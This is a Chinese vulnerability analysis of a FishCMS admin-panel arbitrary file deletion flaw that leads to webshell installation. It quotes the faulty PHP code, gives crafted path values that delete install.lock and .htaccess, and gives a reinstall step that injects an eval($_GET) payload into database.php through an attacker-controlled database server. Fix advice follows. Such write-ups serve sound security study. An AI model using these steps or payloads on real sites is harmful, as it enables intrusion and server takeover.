FishCMS 后台任意文件删除与GetShell漏洞分析<\/h1>

漏洞概述<\/h2>

FishCMS 后台存在一个高危漏洞组合，允许攻击者通过精心构造的请求实现任意文件删除，进而通过重新安装系统获取WebShell。该漏洞主要涉及两个关键操作：<\/p>

任意文件删除漏洞<\/li>

系统重装GetShell<\/li> <\/ol>

漏洞分析<\/h2>

关键代码分析<\/h3>

漏洞核心位于后台删除幻灯片功能中，关键代码如下：<\/p>

$yfile =<\/span> str_replace<\/span>($yuming['option_value'<\/span>],''<\/span>,$slide['slide_pic'<\/span>]);
<\/span><\/span>if<\/span>(!<\/span>empty<\/span>($yfile) &&<\/span> $this-><\/span>isLegalPicture<\/span>($slide['slide_pic'<\/span>])){
<\/span><\/span>    @<\/span>unlink<\/span>(APP_PATH<\/span> .<\/span> '..'<\/span>.<\/span> DS<\/span> .<\/span> $yfile);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>问题在于：<\/p>

isLegalPicture()<\/code> 检查的是原始文件名 $slide['slide_pic']<\/code><\/li>
实际删除操作使用的是经过替换后的 $yfile<\/code><\/li>
参数来源未严格过滤<\/li>
<\/ol>
文件合法性检查函数<\/h3>
isLegalPicture()<\/code> 函数执行以下检查：<\/p>

检查文件扩展名是否为图片格式（白名单）<\/li>
检查文件路径是否包含 \/data\/<\/code>（但要求路径不能直接是 \/data\/a.jpg<\/code>，必须是类似 \/data\/a\/a.jpg<\/code>）<\/li>
<\/ol>
参数来源<\/h3>

$slide['slide_pic']<\/code> - 从数据库获取，可通过添加\/修改幻灯片功能控制<\/li>
$yuming['option_value']<\/code> - 站点域名设置，可通过后台"系统设置->网站信息"修改<\/li>
<\/ol>
漏洞利用步骤<\/h2>
1. 修改站点域名<\/h3>

访问后台 \/admin\/Index\/web.html<\/code>（即使显示无权限也可尝试访问）<\/li>
抓取"系统设置->网站信息"的请求包<\/li>
将domain<\/code>参数修改为：\/data\/b\/111.jpg<\/code><\/li>
提交修改，使options<\/code>表中的option_value<\/code>值变为\/data\/b\/111.jpg<\/code><\/li>
<\/ol>
2. 构造恶意幻灯片<\/h3>

修改幻灯片，将slideshow<\/code>参数设置为：
\/data\/b\/111.jpgapplication\/install.lock\/data\/b\/111.jpg
<\/code><\/pre>
<\/li>
当执行删除操作时，str_replace<\/code>会将\/data\/b\/111.jpg<\/code>替换为空，实际删除的文件变为：
application\/install.lock
<\/code><\/pre>
<\/li>
<\/ol>
3. 删除关键文件<\/h3>

删除install.lock<\/code>后，系统可重新安装<\/li>
为完全清除安装限制，还需删除.htaccess<\/code>文件：

修改另一幻灯片为：
\/data\/b\/111.jpgapplication\/.htaccess\/data\/b\/111.jpg
<\/code><\/pre>
<\/li>
删除该幻灯片<\/li>
<\/ul>
<\/li>
<\/ol>
4. 重新安装获取WebShell<\/h3>

访问安装页面重新安装系统<\/li>
在数据库配置步骤：

将"数据库服务器"地址改为可控的MySQL服务器（如攻击者VPS）<\/li>
将"数据库名"改为恶意代码：
',eval($_GET[1]),'
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>
安装完成后，查看application\/database.php<\/code>文件，其中会包含恶意代码<\/li>
<\/ol>
漏洞修复建议<\/h2>

统一文件检查与实际操作使用的参数<\/li>
对$yuming['option_value']<\/code>进行严格过滤，防止特殊字符<\/li>
对幻灯片文件路径进行更严格的校验<\/li>
安装完成后应禁用安装程序或设置强验证<\/li>
<\/ol>
总结<\/h2>
该漏洞利用了两个关键点：<\/p>

文件检查与实际操作参数不一致导致的任意文件删除<\/li>
系统重装功能缺乏足够的安全验证<\/li>
<\/ol>
开发过程中应特别注意：<\/p>

确保安全检查与实际操作使用相同的参数<\/li>
对用户可控的所有输入进行严格过滤<\/li>
关键系统操作（如重装）应设置多重验证机制<\/li>
<\/ul>